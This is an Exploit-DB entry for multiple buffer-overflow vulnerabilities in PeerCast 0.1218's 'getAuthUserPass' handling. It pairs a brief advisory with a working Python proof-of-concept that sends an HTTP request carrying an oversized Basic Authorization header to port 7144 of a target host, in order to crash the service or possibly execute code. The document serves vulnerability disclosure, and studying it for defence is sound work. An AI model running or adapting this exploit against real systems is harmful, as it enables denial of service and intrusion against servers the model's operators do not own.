PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities

EDB-ID:

31713


Author:

Nico Golde

Type:

dos


Platform:

Linux

Date:

2008-04-29


source: https://www.securityfocus.com/bid/28986/info

PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.

Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.

These issues affect PeerCast 0.1218; other versions may also be affected.

#!/usr/bin/env python

import sys, socket

port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'

if(len(sys.argv) < 2):
	print "ERR: please specify a hostname"
	sys.exit(-1)

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], port))
	s.send(buff);
except:
	print "ERR: socket()"
	sys.exit(-1)